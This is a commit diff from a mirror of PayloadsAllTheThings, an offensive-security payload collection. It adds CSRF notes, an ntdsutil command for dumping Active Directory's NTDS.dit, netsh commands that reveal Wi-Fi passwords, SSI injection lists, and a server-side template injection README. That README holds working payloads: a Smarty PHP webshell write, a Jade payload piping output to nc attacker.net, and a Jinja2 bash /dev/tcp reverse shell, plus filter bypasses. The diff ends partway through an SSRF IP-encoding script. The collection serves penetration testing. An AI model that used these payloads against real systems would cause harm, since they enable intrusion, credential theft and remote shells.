mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-21 18:58:50 +00:00
Bugfix - Errors in stashed changes
This commit is contained in:
parent
cd2d76d538
commit
b9f2fe367c
@ -1,6 +1,6 @@
|
|||||||
# Cross-Site Request Forgery
|
# Cross-Site Request Forgery
|
||||||
|
|
||||||
> Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
|
> Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
|
||||||
|
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
@ -14,6 +14,8 @@
|
|||||||
|
|
||||||
## Payloads
|
## Payloads
|
||||||
|
|
||||||
|
When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
|
||||||
|
|
||||||
### HTML GET – Requiring User Interaction for Proof-of-Concept
|
### HTML GET – Requiring User Interaction for Proof-of-Concept
|
||||||
|
|
||||||
```html
|
```html
|
||||||
@ -98,4 +100,5 @@ xhr.send('{"role":admin}');
|
|||||||
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd
|
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd
|
||||||
- [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani
|
- [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani
|
||||||
- [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones
|
- [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones
|
||||||
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
|
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
|
||||||
|
- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
|
@ -185,6 +185,12 @@ ifm: quit
|
|||||||
ntdsutil: quit
|
ntdsutil: quit
|
||||||
```
|
```
|
||||||
|
|
||||||
|
or
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
|
||||||
|
```
|
||||||
|
|
||||||
#### Using Vshadow
|
#### Using Vshadow
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -225,6 +225,39 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
|
|||||||
C:\inetpub\wwwroot\web.config
|
C:\inetpub\wwwroot\web.config
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Other files
|
||||||
|
|
||||||
|
```bat
|
||||||
|
%SYSTEMDRIVE%\pagefile.sys
|
||||||
|
%WINDIR%\debug\NetSetup.log
|
||||||
|
%WINDIR%\repair\sam
|
||||||
|
%WINDIR%\repair\system
|
||||||
|
%WINDIR%\repair\software, %WINDIR%\repair\security
|
||||||
|
%WINDIR%\iis6.log
|
||||||
|
%WINDIR%\system32\config\AppEvent.Evt
|
||||||
|
%WINDIR%\system32\config\SecEvent.Evt
|
||||||
|
%WINDIR%\system32\config\default.sav
|
||||||
|
%WINDIR%\system32\config\security.sav
|
||||||
|
%WINDIR%\system32\config\software.sav
|
||||||
|
%WINDIR%\system32\config\system.sav
|
||||||
|
%WINDIR%\system32\CCM\logs\*.log
|
||||||
|
%USERPROFILE%\ntuser.dat
|
||||||
|
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
|
||||||
|
%WINDIR%\System32\drivers\etc\hosts
|
||||||
|
```
|
||||||
|
|
||||||
|
### Wifi passwords
|
||||||
|
|
||||||
|
Find AP SSID
|
||||||
|
```bat
|
||||||
|
netsh wlan show profile
|
||||||
|
```
|
||||||
|
|
||||||
|
Get Cleartext Pass
|
||||||
|
```bat
|
||||||
|
netsh wlan show profile <SSID> key=clear
|
||||||
|
```
|
||||||
|
|
||||||
## Processes Enumeration and Tasks
|
## Processes Enumeration and Tasks
|
||||||
|
|
||||||
What processes are running?
|
What processes are running?
|
||||||
@ -372,4 +405,4 @@ runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
|||||||
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
|
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
|
||||||
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
|
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
|
||||||
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
|
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
|
||||||
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
|
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
|
BIN
Server Side Template Injection/Images/serverside.png
Normal file
BIN
Server Side Template Injection/Images/serverside.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 44 KiB |
@ -0,0 +1,75 @@
|
|||||||
|
<pre><!--#exec cmd="ls" --></pre>
|
||||||
|
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||||
|
<pre><!--#exec cmd="whoami"--></pre>
|
||||||
|
<pre><!--#exec cmd="dir" --></pre>
|
||||||
|
<!--#exec cmd="ls" -->
|
||||||
|
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||||
|
<!--#exec cmd="/bin/ls /" -->
|
||||||
|
<!--#exec cmd="dir" -->
|
||||||
|
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||||
|
<!--#config errmsg="File not found, informs users and password"-->
|
||||||
|
<!--#echo var="DOCUMENT_NAME" -->
|
||||||
|
<!--#echo var="DOCUMENT_URI" -->
|
||||||
|
<!--#config timefmt="A %B %d %Y %r"-->
|
||||||
|
<!--#fsize file="ssi.shtml" -->
|
||||||
|
<!--#include file=?UUUUUUUU...UU?-->
|
||||||
|
<!--#echo var="DATE_LOCAL" -->
|
||||||
|
<!--#exec cmd="whoami"-->
|
||||||
|
<!--#printenv -->
|
||||||
|
<!--#flastmod virtual="echo.html" -->
|
||||||
|
<!--#echo var="auth_type" -->
|
||||||
|
<!--#echo var="http_referer" -->
|
||||||
|
<!--#echo var="content_length" -->
|
||||||
|
<!--#echo var="content_type" -->
|
||||||
|
<!--#echo var="http_accept_encoding" -->
|
||||||
|
<!--#echo var="forwarded" -->
|
||||||
|
<!--#echo var="document_uri" -->
|
||||||
|
<!--#echo var="date_gmt" -->
|
||||||
|
<!--#echo var="date_local" -->
|
||||||
|
<!--#echo var="document_name" -->
|
||||||
|
<!--#echo var="document_root" -->
|
||||||
|
<!--#echo var="from" -->
|
||||||
|
<!--#echo var="gateway_interface" -->
|
||||||
|
<!--#echo var="http_accept" -->
|
||||||
|
<!--#echo var="http_accept_charset" -->
|
||||||
|
<!--#echo var="http_accept_language" -->
|
||||||
|
<!--#echo var="http_connection" -->
|
||||||
|
<!--#echo var="http_cookie" -->
|
||||||
|
<!--#echo var="http_form" -->
|
||||||
|
<!--#echo var="http_host" -->
|
||||||
|
<!--#echo var="user_name" -->
|
||||||
|
<!--#echo var="unique_id" -->
|
||||||
|
<!--#echo var="tz" -->
|
||||||
|
<!--#echo var="total_hits" -->
|
||||||
|
<!--#echo var="server_software" -->
|
||||||
|
<!--#echo var="server_protocol" -->
|
||||||
|
<!--#echo var="server_port" -->
|
||||||
|
<!--#echo var="server_name -->
|
||||||
|
<!--#echo var="server_addr" -->
|
||||||
|
<!--#echo var="server_admin" -->
|
||||||
|
<!--#echo var="script_url" -->
|
||||||
|
<!--#echo var="script_uri" -->
|
||||||
|
<!--#echo var="script_name" -->
|
||||||
|
<!--#echo var="script_filename" -->
|
||||||
|
<!--#echo var="netsite_root" -->
|
||||||
|
<!--#echo var="site_htmlroot" -->
|
||||||
|
<!--#echo var="path_translated" -->
|
||||||
|
<!--#echo var="path_info_translated" -->
|
||||||
|
<!--#echo var="request_uri" -->
|
||||||
|
<!--#echo var="request_method" -->
|
||||||
|
<!--#echo var="remote_user" -->
|
||||||
|
<!--#echo var="remote_addr" -->
|
||||||
|
<!--#echo var="http_client_ip" -->
|
||||||
|
<!--#echo var="remote_port" -->
|
||||||
|
<!--#echo var="remote_ident" -->
|
||||||
|
<!--#echo var="remote_host" -->
|
||||||
|
<!--#echo var="query_string_unescaped" -->
|
||||||
|
<!--#echo var="query_string" -->
|
||||||
|
<!--#echo var="path_translated" -->
|
||||||
|
<!--#echo var="path_info" -->
|
||||||
|
<!--#echo var="path" -->
|
||||||
|
<!--#echo var="page_count" -->
|
||||||
|
<!--#echo var="last_modified" -->
|
||||||
|
<!--#echo var="http_user_agent" -->
|
||||||
|
<!--#echo var="http_ua_os" -->
|
||||||
|
<!--#echo var="http_ua_cpu" -->
|
18
Server Side Template Injection/Intruder/ssi_quick.txt
Normal file
18
Server Side Template Injection/Intruder/ssi_quick.txt
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
</nowiki>
|
||||||
|
<!--#echo var="DOCUMENT_NAME" -->
|
||||||
|
<!--#echo var="DOCUMENT_URI" -->
|
||||||
|
<!--#config timefmt="A %B %d %Y %r"-->
|
||||||
|
<!--#echo var="DATE_LOCAL" -->
|
||||||
|
<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#include virtual="/" -->
|
||||||
|
<!--#exec cmd="ls" -->
|
||||||
|
<!--#exec cmd="whoami" -->
|
||||||
|
<!--#exec cmd="uname" -->
|
||||||
|
<!--#exec cmd="dir" -->
|
||||||
|
<!--#exec cmd="cat /etc/passwd" -->
|
||||||
|
<!--#exec cmd="ipconfig" -->
|
||||||
|
<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||||
|
<!--#exec cmd="perl -e 'print "X"*5000'" -->
|
||||||
|
<!--#exec cmd="sleep 5" -->
|
||||||
|
<!--#exec cmd="sleep 10" -->
|
327
Server Side Template Injection/README.md
Normal file
327
Server Side Template Injection/README.md
Normal file
@ -0,0 +1,327 @@
|
|||||||
|
# Templates Injections
|
||||||
|
|
||||||
|
> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Methodology](#methodology)
|
||||||
|
* [Ruby](#ruby)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [List files and directories](#list-files-and-directories)
|
||||||
|
* [Java](#java)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
|
||||||
|
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
|
||||||
|
* [Twig](#twig)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Template format](#template-format)
|
||||||
|
* [Code execution](#code-execution)
|
||||||
|
* [Smarty](#smarty)
|
||||||
|
* [Freemarker](#freemarker)
|
||||||
|
* [Jade / Codepen](#jade---codepen)
|
||||||
|
* [Velocity](#velocity)
|
||||||
|
* [Mako](#mako)
|
||||||
|
* [Jinja2](#jinja2)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Template format](#template-format)
|
||||||
|
* [Dump all used classes](#dump-all-used-classes)
|
||||||
|
* [Dump all config variables](#dump-all-config-variables)
|
||||||
|
* [Read remote file](#read-remote-file)
|
||||||
|
* [Write into remote file](#write-into-remote-file)
|
||||||
|
* [Remote Code Execution](#remote-code-execution)
|
||||||
|
* [Filter bypass](filter-bypass)
|
||||||
|
* [Jinjava](#jinjava)
|
||||||
|
* [Basic injection](#basic-injection)
|
||||||
|
* [Command execution](#command-execution)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
|
||||||
|
e.g:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
|
||||||
|
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
|
||||||
|
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
|
||||||
|
```
|
||||||
|
|
||||||
|
## Methodology
|
||||||
|
|
||||||
|
![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20injections/Images/serverside.png?raw=true)
|
||||||
|
|
||||||
|
## Ruby
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= 7 * 7 %>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Retrieve /etc/passwd
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= File.open('/etc/passwd').read %>
|
||||||
|
```
|
||||||
|
|
||||||
|
### List files and directories
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
<%= Dir.entries('/') %>
|
||||||
|
```
|
||||||
|
|
||||||
|
## Java
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```java
|
||||||
|
${7*7}
|
||||||
|
${{7*7}}
|
||||||
|
${class.getClassLoader()}
|
||||||
|
${class.getResource("").getPath()}
|
||||||
|
${class.getResource("../../../../../index.htm").getContent()}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Retrieve the system’s environment variables
|
||||||
|
|
||||||
|
```java
|
||||||
|
${T(java.lang.System).getenv()}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Retrieve /etc/passwd
|
||||||
|
|
||||||
|
```java
|
||||||
|
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
|
||||||
|
|
||||||
|
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Twig
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{7*7}}
|
||||||
|
{{7*'7'}} would result in 49
|
||||||
|
```
|
||||||
|
|
||||||
|
### Template format
|
||||||
|
|
||||||
|
```python
|
||||||
|
$output = $twig > render (
|
||||||
|
'Dear' . $_GET['custom_greeting'],
|
||||||
|
array("first_name" => $user.first_name)
|
||||||
|
);
|
||||||
|
|
||||||
|
$output = $twig > render (
|
||||||
|
"Dear {first_name}",
|
||||||
|
array("first_name" => $user.first_name)
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
### Code execution
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{self}}
|
||||||
|
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||||
|
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Smarty
|
||||||
|
|
||||||
|
```python
|
||||||
|
{php}echo `id`;{/php}
|
||||||
|
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Freemarker
|
||||||
|
|
||||||
|
Default functionality.
|
||||||
|
|
||||||
|
```python
|
||||||
|
<#assign
|
||||||
|
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Jade / Codepen
|
||||||
|
|
||||||
|
```python
|
||||||
|
- var x = root.process
|
||||||
|
- x = x.mainModule.require
|
||||||
|
- x = x('child_process')
|
||||||
|
= x.exec('id | nc attacker.net 80')
|
||||||
|
```
|
||||||
|
|
||||||
|
## Velocity
|
||||||
|
|
||||||
|
```python
|
||||||
|
#set($str=$class.inspect("java.lang.String").type)
|
||||||
|
#set($chr=$class.inspect("java.lang.Character").type)
|
||||||
|
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
|
||||||
|
$ex.waitFor()
|
||||||
|
#set($out=$ex.getInputStream())
|
||||||
|
#foreach($i in [1..$out.available()])
|
||||||
|
$str.valueOf($chr.toChars($out.read()))
|
||||||
|
#end
|
||||||
|
```
|
||||||
|
|
||||||
|
## Mako
|
||||||
|
|
||||||
|
```python
|
||||||
|
<%
|
||||||
|
import os
|
||||||
|
x=os.popen('id').read()
|
||||||
|
%>
|
||||||
|
${x}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Jinja2
|
||||||
|
|
||||||
|
[Official website](http://jinja.pocoo.org/)
|
||||||
|
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{4*4}}[[5*5]]
|
||||||
|
{{7*'7'}} would result in 7777777
|
||||||
|
```
|
||||||
|
|
||||||
|
Jinja2 is used by Python Web Frameworks such as Django or Flask.
|
||||||
|
The above injections have been tested on Flask application.
|
||||||
|
|
||||||
|
### Template format
|
||||||
|
|
||||||
|
```python
|
||||||
|
{% extends "layout.html" %}
|
||||||
|
{% block body %}
|
||||||
|
<ul>
|
||||||
|
{% for user in users %}
|
||||||
|
<li><a href="{{ user.url }}">{{ user.username }}</a></li>
|
||||||
|
{% endfor %}
|
||||||
|
</ul>
|
||||||
|
{% endblock %}
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Dump all used classes
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{ [].class.base.subclasses() }}
|
||||||
|
{{''.class.mro()[1].subclasses()}}
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Dump all config variables
|
||||||
|
|
||||||
|
```python
|
||||||
|
{% for key, value in config.iteritems() %}
|
||||||
|
<dt>{{ key|e }}</dt>
|
||||||
|
<dd>{{ value|e }}</dd>
|
||||||
|
{% endfor %}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Read remote file
|
||||||
|
|
||||||
|
```python
|
||||||
|
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Write into remote file
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Remote Code Execution
|
||||||
|
|
||||||
|
Listen for connexion
|
||||||
|
|
||||||
|
```bash
|
||||||
|
nv -lnvp 8000
|
||||||
|
```
|
||||||
|
|
||||||
|
Inject this template
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
|
||||||
|
{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
|
||||||
|
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||||
|
```
|
||||||
|
|
||||||
|
### Filter bypass
|
||||||
|
|
||||||
|
```python
|
||||||
|
request.__class__
|
||||||
|
request["__class__"]
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `_`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}&class=class&usc=_
|
||||||
|
|
||||||
|
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
|
||||||
|
{{request|attr(["_"*2,"class","_"*2]|join)}}
|
||||||
|
{{request|attr(["__","class","__"]|join)}}
|
||||||
|
{{request|attr("__class__")}}
|
||||||
|
{{request.__class__}}
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `[` and `]`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)}}&class=class&usc=_
|
||||||
|
or
|
||||||
|
http://localhost:5000/?exploit={{request|attr(request.args.getlist(request.args.l)|join)}}&l=a&a=_&a=_&a=class&a=_&a=_
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypassing `|join`
|
||||||
|
|
||||||
|
```python
|
||||||
|
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
||||||
|
```
|
||||||
|
|
||||||
|
## Jinjava
|
||||||
|
|
||||||
|
### Basic injection
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{'a'.toUpperCase()}} would result in 'A'
|
||||||
|
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
|
||||||
|
```
|
||||||
|
|
||||||
|
Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
|
||||||
|
|
||||||
|
### Command execution
|
||||||
|
|
||||||
|
Fixed by https://github.com/HubSpot/jinjava/pull/230
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
|
||||||
|
|
||||||
|
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||||
|
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||||
|
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||||
|
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||||
|
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||||
|
* [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)
|
||||||
|
* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
|
||||||
|
* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad)
|
||||||
|
* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
|
||||||
|
* [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
|
||||||
|
* [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
|
||||||
|
* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
|
780
Server-Side Request Forgery/Files/ip.py
Normal file
780
Server-Side Request Forgery/Files/ip.py
Normal file
@ -0,0 +1,780 @@
|
|||||||
|
#!/usr/bin/python
|
||||||
|
# coding=utf-8
|
||||||
|
# https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py
|
||||||
|
from __future__ import print_function
|
||||||
|
from random import *
|
||||||
|
from io import open
|
||||||
|
import datetime
|
||||||
|
import string
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import platform
|
||||||
|
import random
|
||||||
|
|
||||||
|
EnclosedAlphanumericsData = {
|
||||||
|
'0' : ['⓪'],
|
||||||
|
'1' : ['①'],
|
||||||
|
'2' : ['②'],
|
||||||
|
'3' : ['③'],
|
||||||
|
'4' : ['④'],
|
||||||
|
'5' : ['⑤'],
|
||||||
|
'6' : ['⑥'],
|
||||||
|
'7' : ['⑦'],
|
||||||
|
'8' : ['⑧'],
|
||||||
|
'9' : ['⑨'],
|
||||||
|
'10' : ['⑩'],
|
||||||
|
'11' : ['⑪'],
|
||||||
|
'12' : ['⑫'],
|
||||||
|
'13' : ['⑬'],
|
||||||
|
'14' : ['⑭'],
|
||||||
|
'15' : ['⑮'],
|
||||||
|
'16' : ['⑯'],
|
||||||
|
'17' : ['⑰'],
|
||||||
|
'18' : ['⑱'],
|
||||||
|
'19' : ['⑲'],
|
||||||
|
'20' : ['⑳'],
|
||||||
|
'.' : ['。','。'],
|
||||||
|
'a' : ['ⓐ'],
|
||||||
|
'b' : ['ⓑ'],
|
||||||
|
'c' : ['ⓒ'],
|
||||||
|
'd' : ['ⓓ'],
|
||||||
|
'e' : ['ⓔ'],
|
||||||
|
'f' : ['ⓕ'],
|
||||||
|
'x' : ['ⓧ'],
|
||||||
|
}
|
||||||
|
|
||||||
|
def RANDOM_TEXT_SPEC():
|
||||||
|
min_char = 12
|
||||||
|
max_char = 16
|
||||||
|
chars = string.ascii_letters + string.digits + "!$%^&*()<>;:,.|\~`"
|
||||||
|
return "".join(choice(chars) for x in range(randint(min_char, max_char)))
|
||||||
|
|
||||||
|
def RANDOM_TEXT():
|
||||||
|
min_char = 12
|
||||||
|
max_char = 16
|
||||||
|
chars = string.ascii_letters + string.digits
|
||||||
|
return "".join(choice(chars) for x in range(randint(min_char, max_char)))
|
||||||
|
|
||||||
|
def DECIMAL_SINGLE(NUMBER,STEP):
|
||||||
|
return int(NUMBER)*(256**STEP)
|
||||||
|
|
||||||
|
def HEX_SINGLE(NUMBER,ADD0X):
|
||||||
|
if ADD0X == "yes":
|
||||||
|
return str(hex(int(NUMBER)))
|
||||||
|
else:
|
||||||
|
return str(hex(int(NUMBER))).replace("0x","")
|
||||||
|
|
||||||
|
def OCT_SINGLE(NUMBER):
|
||||||
|
return str(oct(int(NUMBER))).replace("o","")
|
||||||
|
|
||||||
|
def DEC_OVERFLOW_SINGLE(NUMBER):
|
||||||
|
return str(int(NUMBER)+256)
|
||||||
|
|
||||||
|
def validIP(address):
|
||||||
|
parts = address.split(".")
|
||||||
|
if len(parts) != 4:
|
||||||
|
return False
|
||||||
|
try:
|
||||||
|
for item in parts:
|
||||||
|
if not 0 <= int(item) <= 255:
|
||||||
|
return False
|
||||||
|
except ValueError:
|
||||||
|
print("\nUsage: python "+sys.argv[0]+" IP EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254\nUsage: python "+sys.argv[0]+" 169.254.169.254 export")
|
||||||
|
exit(1)
|
||||||
|
return True
|
||||||
|
|
||||||
|
def plain2EnclosedAlphanumericsChar(s0):
